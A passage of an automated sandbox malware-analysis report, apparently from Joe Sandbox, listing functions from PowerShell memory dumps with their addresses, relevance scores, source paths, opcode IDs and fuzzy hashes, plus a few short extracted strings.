                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2257b87ab10485990d978bec37b4425a139595409dcb816a3db3782fb27f109d
                                                                                                    • Instruction ID: fa0089c1cba5a516653f586e7ef1db285475331a773fecd5cf1f9e7fb8559069
                                                                                                    • Opcode Fuzzy Hash: 2257b87ab10485990d978bec37b4425a139595409dcb816a3db3782fb27f109d
                                                                                                    • Instruction Fuzzy Hash: 7CC1F867A0D7C25FE752972C58A60F57F60EF53225B0980FFC888C70B3DD1A684A9792
                                                                                                    Function 00007FFA3408299C Relevance: .3, Instructions: 278COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f73c845ab0018f1c7ccd9ede52fa0b74e1c3f88fac107ff0c2c39a43ccd1c79
                                                                                                    • Instruction ID: 7a4f1e2676cbffbbb4660b408daffc94ba4ff0f8f28a41fd57bdee5b63c8fae0
                                                                                                    • Opcode Fuzzy Hash: 5f73c845ab0018f1c7ccd9ede52fa0b74e1c3f88fac107ff0c2c39a43ccd1c79
                                                                                                    • Instruction Fuzzy Hash: 8B81D86BA0E7D64FE712AB2DF8E10E63B64DF5323A70941F7C4C8CA493DD1E244A9251
                                                                                                    Function 00007FFA34087B3D Relevance: .2, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 387ab519eb0b11f9a05a726ed01c4af0acff6899ca12fcfb7c306b6cf74ef7df
                                                                                                    • Instruction ID: 0252cc1bb5640584e9ea91ed18f306627a528ecca600109d04aeb1b8222fe182
                                                                                                    • Opcode Fuzzy Hash: 387ab519eb0b11f9a05a726ed01c4af0acff6899ca12fcfb7c306b6cf74ef7df
                                                                                                    • Instruction Fuzzy Hash: 9351B357A0D6E30AF712472C1DAA0E53F61EF63262B0E41F7C9C8DB4979D0F28069351
                                                                                                    Function 00007FFA3408BAD8 Relevance: .1, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 50864e593602bec2f1919b7a1a430d07d25f86eaa606391520e4e732750bb407
                                                                                                    • Instruction ID: 91197265e9604eb42933b6c1f538ffaa196784fd4238b7b543e7df1ed1d2056d
                                                                                                    • Opcode Fuzzy Hash: 50864e593602bec2f1919b7a1a430d07d25f86eaa606391520e4e732750bb407
                                                                                                    • Instruction Fuzzy Hash: D0418B92A0D7C24FF313473858A60E63FB0EFA322570990F7D8988A4A7ED4F5847A351
                                                                                                    Function 00007FFA3408C262 Relevance: .1, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 261336f80cd6b2f75b028cb1e7b259c3f113eb2a7523ae6f52b36c55a83624d6
                                                                                                    • Instruction ID: bbf4f53cc6ab112be0546f1dd2df09a3e57ad4b51583501cc7cc79dc6878ebe9
                                                                                                    • Opcode Fuzzy Hash: 261336f80cd6b2f75b028cb1e7b259c3f113eb2a7523ae6f52b36c55a83624d6
                                                                                                    • Instruction Fuzzy Hash: 7D518467A0CAD31AF362473C55EA1E57FE0EF63224B0941F6C58C8E4A3DE1F6417A241
                                                                                                    Function 00007FFA3408E184 Relevance: 21.6, Strings: 17, Instructions: 304COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M14$ A4$0A4$0A4$8A4$8A4$@A4$XA4$XA4$`L_I$`A4$aL_I$hA4$xA4$xA4$A4$A4
                                                                                                    • API String ID: 0-3177668069
                                                                                                    • Opcode ID: 8e3f97d1eb15e5ebb7ca48fda824e26c006f3ab38cd62e858902a1e5fc3cb481
                                                                                                    • Instruction ID: cb84d0fc7bcc1c22b57776d5757420531e726fa3ee3d39fb45403ee8a1b67b42
                                                                                                    • Opcode Fuzzy Hash: 8e3f97d1eb15e5ebb7ca48fda824e26c006f3ab38cd62e858902a1e5fc3cb481
                                                                                                    • Instruction Fuzzy Hash: 2191E4B7B0DBC14BF6A5829C29491346E81EF9362476885FBE44CD719BEC1EDD0A42C2
                                                                                                    Function 00007FFA340889DA Relevance: 11.4, Strings: 9, Instructions: 187COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L_^$L_^$L_^$L_^$L_^$L_^$L_^$L_^$L_^
                                                                                                    • API String ID: 0-3552479388
                                                                                                    • Opcode ID: 5fa74b2a792104c80c037a914c05f54de9b1a0304baf55495318e646823faaa4
                                                                                                    • Instruction ID: b5fbf2a3993f274ea7528910c17f80168f4e900313f75bdbd7c850826176caac
                                                                                                    • Opcode Fuzzy Hash: 5fa74b2a792104c80c037a914c05f54de9b1a0304baf55495318e646823faaa4
                                                                                                    • Instruction Fuzzy Hash: 126182B7A1C9C34BF655472D89D90647FA0FF63359B0942F9C588AB883EE1F28079781
                                                                                                    Function 00007FFA3408B2DA Relevance: 6.7, Strings: 5, Instructions: 477COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: b,4$4$Hc,4$Pa,4$qL_L
                                                                                                    • API String ID: 0-3493111696
                                                                                                    • Opcode ID: cd724a37fa78a50ca1ef66c6c4447dd52ba33105751f179fc64a956cb475bc6b
                                                                                                    • Instruction ID: 208dcfa3ea2be60fd207640d036ffb453a362a18013f2c25b548fd5fa674f3cb
                                                                                                    • Opcode Fuzzy Hash: cd724a37fa78a50ca1ef66c6c4447dd52ba33105751f179fc64a956cb475bc6b
                                                                                                    • Instruction Fuzzy Hash: 10E16130A08A4D8FDF98EF5CD485AA977F1FF6A310F14816AE41DD7256CE25E842C780
                                                                                                    Function 00007FFA343031EE Relevance: 5.2, Strings: 4, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662417722.00007FFA34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34300000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34300000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HR#n$HR#n$HR#n$i3_H
                                                                                                    • API String ID: 0-4128354501
                                                                                                    • Opcode ID: 526d352f50e5d5bbe29a3382f47a66a8691ded7fe1b2d6311b62fda9e05f9be4
                                                                                                    • Instruction ID: 39e6caf5d88cc5cc6af33843386138e8b7e661a32d0763b87fcd83d8f33e5f14
                                                                                                    • Opcode Fuzzy Hash: 526d352f50e5d5bbe29a3382f47a66a8691ded7fe1b2d6311b62fda9e05f9be4
                                                                                                    • Instruction Fuzzy Hash: 6E512661A0DB8A0FE7A5976C58D12B4BFD1FF57210B4882FBD80ECB197DE1A9C458342